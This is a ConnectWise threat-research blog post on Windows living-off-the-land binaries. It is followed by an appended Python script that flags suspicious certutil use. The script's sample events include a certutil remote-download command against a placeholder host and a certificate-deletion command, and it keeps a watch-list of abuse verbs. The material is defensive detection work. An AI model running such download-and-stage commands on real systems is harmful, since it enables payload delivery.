
ConnectWise

11/1/2023

Unveiling LOLBins: Living off the land binaries


LOLBins, short for living off the land binaries, are an integral part of the cybersecurity landscape. Pre-installed on most Windows systems or downloadable from Microsoft, these Microsoft-signed tools are exploited by threat actors to blend into regular system activity. This inconspicuous nature makes them challenging to detect, elevating them to a top choice for threat actors across various campaigns.

Threat actors could instead bring their own custom tooling onto a system to achieve their objectives, but that comes with its own hurdles. Transporting tools onto a target system requires a threat actor to get through a variety of security controls, such as endpoint detection and response (EDR) and intrusion detection systems, which are typically tuned to detect that sort of activity. With LOLBins, the tools are already on the system for an actor to abuse in any way they see fit.

Here in the ConnectWise Research Unit (CRU), we have done extensive research into LOLBins that are actively exploited, to ensure that we can detect a variety of uses outside their typical bounds. The LOLBAS project, which is dedicated to cataloging the attack method of living off the land binaries and scripts (LOLBAS), has done a fantastic job documenting and writing detection recommendations for many Windows binaries that can be put to unintended malicious use, and we draw heavily on that work.

In part one of this LOLBins blog series, we will review some of the more prevalent LOLBins that we have observed across various recorded incidents.

LOLBins background

While the forefront of cyberthreats primarily showcases notorious malware, ransomware, and zero-day vulnerabilities, the persistent misuse of legitimate scripts and binaries, traditionally considered benign, remains a significant concern. LOLBins are tools with numerous legitimate applications, yet they also carry a significant risk of abuse. Their ability to perform a wide range of functions provides an attractive attack surface for threat actors to exploit. Many of these functions are crucial for computer systems and networks of all sizes, making it impossible to outright restrict them.

As our threat intelligence research deepens, it is clear that some LOLBins stand out in their prevalence and utility for cybercriminals compared to others. Powershell.exe, Cmd.exe, and Rundll32.exe are at the forefront of LOLBin usage. These LOLBins are the most used because of their broad functionality and flexibility. In the majority of LOLBin usage, whether benign or malicious, you will observe executables being run with Command Prompt or PowerShell. PowerShell is a versatile scripting platform that seamlessly integrates with .NET, the Windows API, and WMI, excelling in remote operations and file management.

In contrast, CMD specializes in batch processing and launching executables, making it a valuable tool for specific attack chains despite its more limited capabilities compared to PowerShell. The popularity of Rundll32.exe is directly related to its versatile nature. Among other things, this binary can load and execute DLL files, dump processes, and download and execute payloads from the internet—all useful features that make this binary very appealing to threat actors.

Outside of these three common contenders, there are a myriad of other LOLBins that are being used to accomplish various objectives. This report will explore some of the more prevalent yet lesser-known LOLBins witnessed in various incidents perpetrated by threat actors within the systems we monitor. Four LOLBins that have been of particular interest based on recent activity observed in events across our partners are CertUtil, NlTest, PsExec, and Wscript.

CertUtil

Originally designed for viewing and managing certificates, CertUtil is becoming a very popular tool for threat actors. CertUtil has been used to export or delete security certificates and even remotely download payloads. Groups like Volt Typhoon and Double Dragon have been observed using this executable for various objectives.

Typical CertUtil activity should look like this:

C:\Windows\system32\certutil.exe -dump "C:\Program Files\[Dir]\config\xxxx.pem"

Figure 1. Typical CertUtil Dump Activity

certutil.exe -store root [Certificate String]

Figure 2. Typical CertUtil Root Certificate Export Activity
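To turn the distinction between the routine activity in Figures 1 and 2 and the abuse described above into something a SOC can actually run, here is an added example (written for this page; it is not CRU's detection logic or the LOLBAS project's rules) that classifies certutil command lines taken from constructed process-creation records. The sample command lines, the allow-list of routine verbs and the watch-list of verbs mapped to the post's abuse categories are all assumptions.

```python
import re
import shlex

# Constructed sample process-creation command lines (not real telemetry). The
# first two mirror the routine activity in Figures 1 and 2; the next two model
# the remote-download and certificate-deletion abuse the post describes.
SAMPLE_EVENTS = [
    r'C:\Windows\system32\certutil.exe -dump "C:\Program Files\App\config\server.pem"',
    "certutil.exe -store root 1a2b3c4d5e6f",
    "certutil.exe -urlcache -split -f http://example.invalid/update.bin C:\\Users\\Public\\u.bin",
    "certutil -delstore root 1a2b3c4d5e6f",
    "notepad.exe C:\\Users\\Public\\notes.txt",
]

# Assumed allow-list: verbs that match routine certificate management.
TYPICAL_VERBS = {"-dump", "-store", "-verify", "-hashfile"}
# Assumed watch-list: verbs tied to the behaviours the post calls out
# (remote download, deleting certificates, exporting certificates and keys).
WATCH_VERBS = {
    "-urlcache": "remote download via URL cache",
    "-delstore": "certificate deletion",
    "-exportpfx": "certificate and key export",
}
URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def analyze(cmdline):
    """Return None for non-certutil commands, else a dict with verdict and reasons."""
    tokens = shlex.split(cmdline, posix=False)  # non-POSIX keeps Windows backslashes intact
    if not tokens:
        return None
    image = tokens[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image not in ("certutil", "certutil.exe"):
        return None
    # certutil accepts both -verb and /verb; normalise to the dash form.
    verbs = {"-" + t[1:].lower() for t in tokens[1:] if t[:1] in ("-", "/")}
    reasons = [WATCH_VERBS[v] for v in sorted(verbs) if v in WATCH_VERBS]
    if any(URL_RE.match(t.strip('"')) for t in tokens[1:]):
        reasons.append("URL in arguments")
    if reasons:
        verdict = "suspicious"
    elif verbs and verbs <= TYPICAL_VERBS:
        verdict = "typical"
    else:
        verdict = "review"  # certutil used with verbs outside the allow-list
    return {"image": image, "verbs": sorted(verbs), "verdict": verdict, "reasons": reasons}


def scan(events):
    """Return only the certutil invocations that need analyst attention."""
    results = [(e, analyze(e)) for e in events]
    return [(e, r) for e, r in results if r and r["verdict"] != "typical"]


if __name__ == "__main__":
    for cmd, r in scan(SAMPLE_EVENTS):
        print(r["verdict"], "|", cmd, "|", ", ".join(r["reasons"]))
```

Feeding real Sysmon Event ID 1 or EDR process-creation command lines through scan() gives a first-pass triage list; the "review" verdict is there so that certutil verbs you have not yet profiled are surfaced rather than silently accepted.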
